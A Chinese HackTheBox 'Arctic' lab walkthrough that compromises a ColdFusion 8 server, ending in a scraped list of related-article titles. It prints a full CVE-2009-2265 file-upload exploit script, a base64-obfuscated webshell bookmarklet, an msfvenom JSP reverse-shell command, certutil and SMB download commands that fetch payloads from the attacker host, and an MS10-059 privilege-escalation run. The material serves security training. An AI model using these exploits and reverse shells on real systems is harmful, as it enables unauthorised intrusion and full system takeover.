Hackthebox:Arctic Walkthrough
预备知识
使用了msfvenom,不想看的可以跳过
浏览器信息收集尤其是细节发现服务信息不能过度依赖工具
MS10-059、smbserver、jsp reverse shell
信息收集和获取立足点
不知道为什么,最近htb的靶机网络不太稳
先用nmap快速探测下开启端口,这里使用-Pn参数,非ping扫描,不执行主机发现,可以跳过防火墙
nmap -Pn 10.10.10.11
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-08 12:08 CST
Nmap scan report for 10.10.10.11
Host is up (0.29s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
8500/tcp open fmtp
49154/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 20.83 seconds
再开启一个详细扫描,暂时也没什么别的信息,只能看nmap的详细输出了
nmap -sC -sV -Pn -p- 10.10.10.11
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
只能访问这几个端口看看有没有web服务了http://10.10.10.11:8500/ http://10.10.10.11:49154/
http://10.10.10.11:8500/上有web服务
看看是不是已知的cmd或者漏洞组件
whatweb -vv http://10.10.10.11:8500/
http://10.10.10.11:8500/ [200]
Identifying: http://10.10.10.11:8500/
HTTP-Status: 200
[["IP", [{:string=>"10.10.10.11", :certainty=>100}]],["Title", [{:name=>"page title", :string=>"Index of /", :certainty=>100}]],["Country", [{:string=>"RESERVED", :module=>"ZZ", :certainty=>100}]],["Index-Of",[{:text=>"<title>Index of /",:regexp_compiled=>/<title>Index\ of\ \//,:certainty=>100}]],["HTTPServer",[{:name=>"server string", :string=>"JRun Web Server", :certainty=>100}]]]WhatWeb report for http://10.10.10.11:8500/
Status : 200 OK
Title : Index of /
IP : 10.10.10.11
Country : RESERVED, ZZSummary : Index-Of, HTTPServer[JRun Web Server]Detected Plugins:
[ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. String : JRun Web Server (from server string){:name=>"server string", :certainty=>100, :string=>"JRun Web Server"}[ Index-Of ]Index of {:certainty=>100}Google Dorks: (1)HTTP Headers:HTTP/1.0 200 OKDate: Wed, 09 Dec 2020 13:26:00 GMTContent-Type: text/html; charset=utf-8Connection: closeServer: JRun Web Server
信息没什么用,读读文件寻找线索,如http://10.10.10.11:8500/CFIDE/Application.cfm ,看到了如下信息
猜测组件是 ColdFusion,搜索相关漏洞
访问http://10.10.10.11:8500/CFIDE/administrator/发现版本是8
正好有个CVE:2009-2265,搜索很久找到了一个exploit,还是在htb论坛搜到的https://forum.hackthebox.eu/discussion/116/python-coldfusion-8-0-1-arbitrary-file-upload
#!/usr/bin/python
# Exploit Title: ColdFusion 8.0.1 - Arbitrary File Upload
# Date: 2017-10-16
# Exploit Author: Alexander Reid
# Vendor Homepage: http://www.adobe.com/products/ColdFusion-family.html
# Version: ColdFusion 8.0.1
# CVE: CVE-2009-2265
#
# Description:
# A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1
# Uploads the specified jsp file to the remote server.
#
# Usage: ./exploit.py <target ip> <target port> [/path/to/ColdFusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
import requests, sys, ostry:ip = sys.argv[1]port = sys.argv[2]if len(sys.argv) == 5:path = sys.argv[3]filename = os.path.basename(sys.argv[4])with open(sys.argv[4], 'r') as payload:body=payload.read()else:path = ""filename = os.path.basename(sys.argv[3])with open(sys.argv[3], 'r') as payload:body=payload.read()
except IndexError:print 'Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/ColdFusion] </path/to/payload.jsp>'print 'Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp'sys.exit(-1)basepath = "http://" + ip + ":" + port + pathprint 'Sending payload...'
print 'Base filename is {}'.format(filename)try:req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{}%00".format(filename),files={ 'newfile': ('sploit.txt', body, 'application/x-java-archive' )})print 'Base path is {}'.format(basepath)if req.status_code == 200:print 'Successfully uploaded payload!\nFind it at {}/userfiles/file/{}'.format(basepath, filename)else:print 'Failed to upload payload... {} {}'.format(str(req.status_code), req.reason)
except requests.Timeout:print 'Failed to upload payload... Request timed out'
看了下使用方式,需要一个jsp马,这里使用kali自带的jsp马/usr/share/webshells/cmdjsp.jsp
python exploit.py 10.10.10.11 8500 /home/bot/shell.jsp
但是失败了,,,,因为实在用不好,然后用一个老外推荐的的这个shell
将以下代码作为链接添加到书签栏,然后在cmd.jsp页面上单击它。
javascript:{window.localStorage.embed=window.atob("ZG9jdW1lbnQud3JpdGUoIjxwPiIpOw0KdmFyIGh0bWwgPSAiPGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPSdjbWQuanNwJz5cDQo8aW5wdXQgbmFtZT0nYycgdHlwZT10ZXh0PjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nUnVuJz5cDQo8L2Zvcm0+PGhyPlwNCjxmb3JtIGFjdGlvbj0nY21kLmpzcCcgbWV0aG9kPXBvc3Q+XA0KVXBsb2FkIGRpcjogPGlucHV0IG5hbWU9J2EnIHR5cGU9dGV4dCB2YWx1ZT0nLic+PGJyPlwNClNlbGVjdCBhIGZpbGUgdG8gdXBsb2FkOiA8aW5wdXQgbmFtZT0nbicgdHlwZT0nZmlsZScgaWQ9J2YnPlwNCjxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J2InIGlkPSdiJz5cDQo8aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJz5cDQo8L2Zvcm0+PGhyPiI7DQp2YXIgZGl2ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnZGl2Jyk7DQpkaXYuaW5uZXJIVE1MID0gaHRtbDsNCmRvY3VtZW50LmJvZHkuaW5zZXJ0QmVmb3JlKGRpdiwgZG9jdW1lbnQuYm9keS5maXJzdENoaWxkKTsNCg0KdmFyIGhhbmRsZUZpbGVTZWxlY3QgPSBmdW5jdGlvbihldnQpIHsNCiAgICB2YXIgZmlsZXMgPSBldnQudGFyZ2V0LmZpbGVzOw0KICAgIHZhciBmaWxlID0gZmlsZXNbMF07DQoNCiAgICBpZiAoZmlsZXMgJiYgZmlsZSkgew0KICAgICAgICB2YXIgcmVhZGVyID0gbmV3IEZpbGVSZWFkZXIoKTsNCg0KICAgICAgICByZWFkZXIub25sb2FkID0gZnVuY3Rpb24ocmVhZGVyRXZ0KSB7DQogICAgICAgICAgICB2YXIgYmluYXJ5U3RyaW5nID0gcmVhZGVyRXZ0LnRhcmdldC5yZXN1bHQ7DQogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnYicpLnZhbHVlID0gYnRvYShiaW5hcnlTdHJpbmcpOw0KICAgICAgICB9Ow0KDQogICAgICAgIHJlYWRlci5yZWFkQXNCaW5hcnlTdHJpbmcoZmlsZSk7DQogICAgfQ0KfTsNCmlmICh3aW5kb3cuRmlsZSAmJiB3aW5kb3cuRmlsZVJlYWRlciAmJiB3aW5kb3cuRmlsZUxpc3QgJiYgd2luZG93LkJsb2IpIHsNCiAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZicpLmFkZEV2ZW50TGlzdGVuZXIoJ2NoYW5nZScsIGhhbmRsZUZpbGVTZWxlY3QsIGZhbHNlKTsNCn0gZWxzZSB7DQogICAgYWxlcnQoJ1RoZSBGaWxlIEFQSXMgYXJlIG5vdCBmdWxseSBzdXBwb3J0ZWQgaW4gdGhpcyBicm93c2VyLicpOw0KfQ==");eval(window.localStorage.embed);};void(0);
然而一直报错,试了好多,都失败了,最后只能用msfvenom生成的的shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.4 LPORT=1234 -f raw > hello.jsp
本地起个nc监听,浏览器访问一下即可收到shell
权限提升
还是windows-exploit-suggester
sudo python windows-exploit-suggester.py --database 2020-12-08-mssb.xls --systeminfo Arctic.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
certutil -urlcache -f http://10.10.14.4/JuicyPotato.exe JuicyPotato.exe
不过下载失败了,所以只能用smbserver下载了
本地作为smbserver执行
sudo smbserver.py share `pwd`
最后用的是MS10-059,这个是编译好的版本
net use \\10.10.14.4\share
copy \\10.10.14.4\share\MS10-059.exe
先在本机nc监听一个端口5555
shell执行MS10-059.exe 10.10.14.4 5555
10.10.10.11: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.11] 50197
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\ColdFusion8\runtime\bin>whoami
whoami
nt authority\systemC:\ColdFusion8\runtime\bin>
下面是失败的提权过程
回到之前的shell
net use \\10.10.14.4\share
copy \\10.10.14.4\share\JuicyPotato.exe
执行JuicyPotato.exe,不过下面失败
JuicyPotato.exe -z -l !port! -c %%i >> result.log
JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1337 -c {03e15b2e-cca6-451c-8fb0-1e2ee37a27dd}
Hackthebox:Arctic Walkthrough相关推荐
- Hackthebox::grandpa walkthrough
Grandpa是hackthebox上一台难度为简单的windows靶机 信息收集 首先使用nmap扫描一下端口情况 然后使用nmap扫描一下是否存在漏洞 通过两次nmap的扫描,我们得知靶机开放了8 ...
- HackTheBox: Arctic靶场
废话不多说直接开始: 第一步是在计算机上运行NMAP: # Nmap 7.80 scan initiated Sat Sep 19 14:54:46 2020 as: nmap -sV -O -sC ...
- Hackthebox:Silo Walkthrough(not use metasploit)
预备知识 Oracle 数据库渗透:oracle默认端口.odat使用--sid.用户名密码爆破.任意文件上传 JuicyPotato提权 netcat.certutil.nmap 信息收集和获取立足 ...
- 吐血规劝!程序员防猝死终极指南
快过年了,跟我可爱的小侄子通了个电话,上来就说,"叔叔你头发怎么变少了",我很痛心,我的小侄子,年纪轻轻的,眼神已经这么不好使了.但转念一想,这也是他对我的一种关心,作为叔叔,也该 ...
- Hackthebox:Granny Walkthrough(not use metasploit)
预备知识 nikto.nmap.iis6.0的webdav.davtest.kali自带webshell. 信息收集 nmap 10.10.10.15 只开了个80端口,那么还是web,浏览器访问目标 ...
- A Complete Machine Learning Walk-Through in Python
A Complete Machine Learning Project Walk-Through in Python: Part One A Complete Machine Learning Pro ...
- sqlmap md5怎么解密_三十九,hackthebox渗透之DirBuster扫描路径及Sqlmap
一.DirBuster扫描目录 hack the box是一个在线Web渗透实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有.因为这些靶机放在平台上供大 ...
- OPEN(SAP) UI5 学习入门系列之四:更好的入门系列-官方Walkthrough
好久没有更新了,实在不知道应该写一些什么内容,因为作为入门系列,实际上应该更多的是操作而不是理论,而在UI5 SDK中的EXPLORER里面有着各种控件的用法,所以在这里也没有必要再来一遍,还是看官方 ...
- exif viewer java,1earn/XSS挑战-WalkThrough.md at master · dizhaung/1earn · GitHub
XSS挑战-WalkThrough 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 知识点 无过滤 XSS (level 1) 各种难度 ...
最新文章
- 网站流量排名常用名词pv_ip_alex_uv
- 打印机打印网页不清晰_针式打印机不开机故障维修
- html5 填表 表单 input output 与表单验证
- python高级功能_python高级篇
- 【CH5105】Cookies
- shell awk实现实时监控网卡流量脚本(常见应用二)
- asp.net中的窗体身份验证(完整篇之三:用户登录页面)
- IDA Pro、OllyDbg、LordPE和UltraEdit简单实用实验
- PS学习笔记(88天和我一起学会PS)(8/88)
- 学习微信开发公众号的第一天(根据文字自动回复文字)
- 自主研发的流程引擎怎么样?好用吗?
- 洛杉矶 夏威夷_夏威夷大学如何解决当今的高等教育问题
- 当前应用拦截NFC响应,不弹出选择框教程
- 令人躁动一时且令人不安的TCP BBR算法
- 远程电脑打游戏鼠标漂移无法操作解决办法
- ubuntu使用meld/beyond compare 做git的diff工具
- KVM虚拟化配置详解
- 《我们到底应该怎么吃》读书笔记-- 待续
- 问题解决:使用GitHub时git push需要输入账号和密码Username for... (Use git clone SSH) git remote add 或set-url(推荐)
- 到底什么样的企业才适合实施SAP系统?
热门文章
- Redis 位图数据结构介绍
- java培训 | 零基础学习java开发的学习方法有哪些
- 电影TS、TC、SCR、R5、BD、HD等版本是什么意思(转)
- 珠宝erp是否能带回珠宝行业的“黄金时代”?
- 交通计算机专业硕士论文,基于强化学习的交通拥堵控制方法研究-计算机技术专业论文.docx...
- Java每天10道面试题,跟我走,offer有!(十)
- 如何将电脑的代理网络以WIFI热点的方式共享
- 矿产行业智能采购管理系统开发,采购平台提升矿企核心竞争力
- 3-1、React-Router基础使用plus
- 1#includestdio.h #includestring.h int deng(char a[],ch、用函数实现登陆功能(三次机会),然后在主函数中根据调用后的结果判断 登陆成功与否。